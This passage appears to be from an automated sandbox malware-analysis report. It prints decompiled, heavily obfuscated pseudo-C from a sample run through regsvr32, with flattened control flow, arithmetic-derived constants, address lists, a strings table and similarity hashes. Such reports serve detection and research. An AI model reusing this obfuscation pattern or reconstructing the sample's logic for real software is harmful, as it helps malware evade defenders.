				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E040EC237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E040EE1F8(0x40d13d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E040D738A(_v220, _t832, _v380, _v412,  &_v112, E040EE1F8(0x40d1318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E040EFECB(_t832, _v396, _v364, _v404, _v168);
											E040EFECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E040D2EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E040EE1F8(0x40d1368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x40d1368;
													_t844 = E040F16C0(_v276, 0x40d1368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x40f6224; // 0x0
														E040EC9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E040EFECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E040DF7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E040D3431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E040DBC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E040EE1F8(0x40d1368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x40d1368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E040EFECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E040D51E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E040EC237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E040F43E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E040EC2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x040e0f90
0x040e0f92
0x040e0f99
0x040e0fa6
0x040e0fa8
0x040e0fad
0x040e0fb4
0x040e0fbb
0x040e0fc3
0x040e0fcb
0x040e0fd0
0x040e0fd8
0x040e0fe0
0x040e0feb
0x040e0ff3
0x040e0ffe
0x040e1013
0x040e101a
0x040e1025
0x040e1030
0x040e103b
0x040e1046
0x040e1051
0x040e1059
0x040e1061
0x040e1069
0x040e1074
0x040e107f
0x040e108a
0x040e1095
0x040e10a2
0x040e10a5
0x040e10a9
0x040e10b6
0x040e10ba
0x040e10bf
0x040e10ca
0x040e10d5
0x040e10e0
0x040e10eb
0x040e10f6
0x040e1101
0x040e110c
0x040e1117
0x040e1122
0x040e1134
0x040e1139
0x040e1142
0x040e114d
0x040e1160
0x040e1161
0x040e1168
0x040e1173
0x040e117b
0x040e1186
0x040e118a
0x040e118f
0x040e119a
0x040e11a5
0x040e11b0
0x040e11bb
0x040e11ce
0x040e11d7
0x040e11e2
0x040e11ea
0x040e11f2
0x040e1201
0x040e1204
0x040e1208
0x040e1210
0x040e121b
0x040e122b
0x040e1232
0x040e123d
0x040e1248
0x040e1253
0x040e125b
0x040e1266
0x040e127c
0x040e1283
0x040e128e
0x040e1299
0x040e12a4
0x040e12af
0x040e12ba
0x040e12c5
0x040e12d8
0x040e12d9
0x040e12e0
0x040e12eb
0x040e12f6
0x040e12fd
0x040e1305
0x040e1310
0x040e131e
0x040e1322
0x040e132f
0x040e1333
0x040e133b
0x040e1346
0x040e1351
0x040e1359
0x040e1364
0x040e136c
0x040e1374
0x040e137c
0x040e1384
0x040e138c
0x040e1394
0x040e1399
0x040e13a1
0x040e13a6
0x040e13ae
0x040e13b6
0x040e13be
0x040e13c6
0x040e13cb
0x040e13d3
0x040e13de
0x040e13e9
0x040e13f4
0x040e1407
0x040e140e
0x040e1419
0x040e1424
0x040e142c
0x040e1434
0x040e143c
0x040e1444
0x040e1454
0x040e1459
0x040e1464
0x040e1467
0x040e146b
0x040e1473
0x040e147b
0x040e1480
0x040e1490
0x040e1494
0x040e149c
0x040e14a4
0x040e14ac
0x040e14b4
0x040e14bc
0x040e14c4
0x040e14cf
0x040e14d7
0x040e14e2
0x040e14ea
0x040e14f4
0x040e14f5
0x040e14fe
0x040e1502
0x040e150a
0x040e1512
0x040e151a
0x040e1522
0x040e152a
0x040e1532
0x040e153d
0x040e1548
0x040e1553
0x040e155e
0x040e1566
0x040e156e
0x040e1576
0x040e157b
0x040e1583
0x040e158b
0x040e1593
0x040e159d
0x040e15a1
0x040e15a9
0x040e15b4
0x040e15ca
0x040e15d1
0x040e15dc
0x040e15e7
0x040e15ef
0x040e15fa
0x040e1605
0x040e1610
0x040e1618
0x040e1623
0x040e1637
0x040e1646
0x040e164d
0x040e165a
0x040e166e
0x040e1673
0x040e167c
0x040e1687
0x040e1692
0x040e169d
0x040e16a8
0x040e16b3
0x040e16be
0x040e16c9
0x040e16d1
0x040e16d5
0x040e16dd
0x040e16e5
0x040e16ed
0x040e16f8
0x040e1703
0x040e170e
0x040e1719
0x040e1720
0x040e1725
0x040e172e
0x040e1739
0x040e174b
0x040e1750
0x040e1759
0x040e1764
0x040e176f
0x040e177a
0x040e1785
0x040e1790
0x040e179b
0x040e17a3
0x040e17ae
0x040e17b9
0x040e17c1
0x040e17c9
0x040e17d4
0x040e17df
0x040e17ee
0x040e17f3
0x040e17fc
0x040e1807
0x040e1812
0x040e181d
0x040e1828
0x040e1833
0x040e183e
0x040e1846
0x040e1851
0x040e185c
0x040e1867
0x040e186f
0x040e187a
0x040e1885
0x040e1890
0x040e189b
0x040e18a6
0x040e18b1
0x040e18c0
0x040e18c3
0x040e18ca
0x040e18d5
0x040e18e8
0x040e18f1
0x040e18fc
0x040e190a
0x040e190f
0x040e1913
0x040e1918
0x040e1920
0x040e1928
0x040e1930
0x040e1938
0x040e1947
0x040e194a
0x040e194e
0x040e1956
0x040e1961
0x040e196c
0x040e1977
0x040e198d
0x040e199f
0x040e19a6
0x040e19b1
0x040e19bc
0x040e19c7
0x040e19d2
0x040e19e4
0x040e19e9
0x040e19f2
0x040e19fd
0x040e1a08
0x040e1a13
0x040e1a1e
0x040e1a26
0x040e1a36
0x040e1a3e
0x040e1a49
0x040e1a54
0x040e1a5f
0x040e1a6a
0x040e1a75
0x040e1a84
0x040e1a87
0x040e1a8e
0x040e1a99
0x040e1aa1
0x040e1aa9
0x040e1aae
0x040e1ab3
0x040e1abb
0x040e1ac8
0x040e1acc
0x040e1ad4
0x040e1adc
0x040e1ae4
0x040e1aec
0x040e1af4
0x040e1afc
0x040e1b01
0x040e1b09
0x040e1b17
0x040e1b1e
0x040e1b23
0x040e1b2e
0x040e1b2f
0x040e1b3a
0x040e1b3e
0x040e1b43
0x040e1b4b
0x040e1b58
0x040e1b5c
0x040e1b61
0x040e1b69
0x040e1b71
0x040e1b84
0x040e1b93
0x040e1b9a
0x040e1ba5
0x040e1bb0
0x040e1bb8
0x040e1bc3
0x040e1bce
0x040e1bd9
0x040e1be4
0x040e1bf8
0x040e1bff
0x040e1c0a
0x040e1c15
0x040e1c20
0x040e1c2b
0x040e1c36
0x040e1c41
0x040e1c4c
0x040e1c57
0x040e1c5f
0x040e1c67
0x040e1c6f
0x040e1c74
0x040e1c7c
0x040e1c7c
0x040e1c81
0x040e1c81
0x040e1c86
0x040e1c86
0x040e1c86
0x040e1c8b
0x040e1c8b
0x040e1c8b
0x040e1c8b
0x040e1c91
0x00000000
0x00000000
0x040e1c97
0x040e1f03
0x040e1f0a
0x040e1c7c
0x040e1c7c
0x00000000
0x040e1c7c
0x040e1c9d
0x040e1ca3
0x040e1e0d
0x040e1e19
0x040e1e1d
0x040e1e2b
0x040e1e3a
0x040e1e41
0x040e1e48
0x040e1e97
0x040e1ea7
0x040e1eb6
0x040e1ed6
0x040e1edb
0x040e1ee2
0x00000000
0x040e1ca9
0x040e1caf
0x040e1dfd
0x040e1e03
0x040e1c7c
0x040e1c7c
0x00000000
0x040e1c7c
0x040e1cb5
0x040e1cb7
0x040e1cf7
0x040e1d03
0x040e1d0a
0x040e1d1d
0x040e1d28
0x040e1d38
0x040e1d76
0x040e1d7b
0x040e1d7e
0x040e1d85
0x040e1dbe
0x040e1d87
0x040e1d9f
0x040e1daf
0x040e1db4
0x040e1db7
0x040e1db7
0x040e1de1
0x040e1de6
0x040e20f6
0x040e20f6
0x040e20fb
0x040e2100
0x040e2105
0x00000000
0x040e1cb9
0x040e1cbf
0x040e212e
0x040e1cc5
0x040e1cc7
0x040e1ce3
0x040e1cea
0x040e1cf0
0x040e1cf2
0x040e1c7c
0x040e1c7c
0x040e1c81
0x040e1c86
0x040e1c86
0x00000000
0x040e1c86
0x040e1cc9
0x040e1ccf
0x00000000
0x040e1cd5
0x040e1cd5
0x00000000
0x040e1cd5
0x040e1ccf
0x040e1cc7
0x040e1cbf
0x040e1cb7
0x040e1caf
0x040e1ca3
0x040e2137
0x040e2141
0x040e2141
0x040e1f14
0x040e1f1a
0x040e204f
0x040e205b
0x040e2062
0x040e20c6
0x040e20dd
0x040e20ee
0x040e20f3
0x00000000
0x040e1f20
0x040e1f20
0x040e1f22
0x040e2038
0x040e203d
0x040e2045
0x040e2047
0x00000000
0x040e1f28
0x040e1f28
0x040e1f2e
0x040e1ffc
0x040e2003
0x040e1c7c
0x040e1c7c
0x00000000
0x040e1c7c
0x040e1f34
0x040e1f34
0x040e1f3a
0x040e1f86
0x040e1fb6
0x040e1fbd
0x040e1fcc
0x040e1fce
0x040e1fd3
0x040e1fd8
0x00000000
0x040e1f3c
0x040e1f3c
0x040e1f3e
0x00000000
0x040e1f44
0x040e1f6f
0x040e1f71
0x040e1f76
0x00000000
0x040e1f76
0x040e1f3e
0x040e1f3a
0x040e1f2e
0x040e1f22
0x00000000
0x040e210a
0x040e210a
0x040e210a
0x00000000
0x040e2116
0x040e1c86
0x040e1c81

Strings

D)/, xrefs: 040E1C2B
0H\, xrefs: 040E16ED
buV, xrefs: 040E1BE4
], xrefs: 040E1918
inpG, xrefs: 040E13FF
2^~, xrefs: 040E150A
SG<, xrefs: 040E1AB3
Xn!, xrefs: 040E1266
o]n, xrefs: 040E1A6A
y.n, xrefs: 040E1719
x, xrefs: 040E15B4
nB[N, xrefs: 040E17C9
inpG, xrefs: 040E1419
Na$, xrefs: 040E12C5
R, xrefs: 040E1AF4
2f, xrefs: 040E1956
jW, xrefs: 040E107F
KN, xrefs: 040E151A

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
API String ID: 0-421492616
Opcode ID: 7350c5c6335622ab9f3453ee33d479f4970e98b79b38ffa2347ce99ba0ae94f1
Instruction ID: ad02e81a4c101fe274a9f9c1b3acbc0723f7046df353da6978e662f918d14b82
Opcode Fuzzy Hash: 7350c5c6335622ab9f3453ee33d479f4970e98b79b38ffa2347ce99ba0ae94f1
Instruction Fuzzy Hash: 199201711093818FD378CF65C94AB9BBBE2FBC4308F10891DE69A9A260D7B19559CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E2E5D, Relevance: 21.9, Strings: 17, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E040E2E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0x40d1808);
								_v292 = _t770;
								_t708 = E040E4244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E040EE1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E040EFECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E040DC5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E040ECCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E040DE404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								E040F2B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E040DC5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E040ECCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E040DE404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
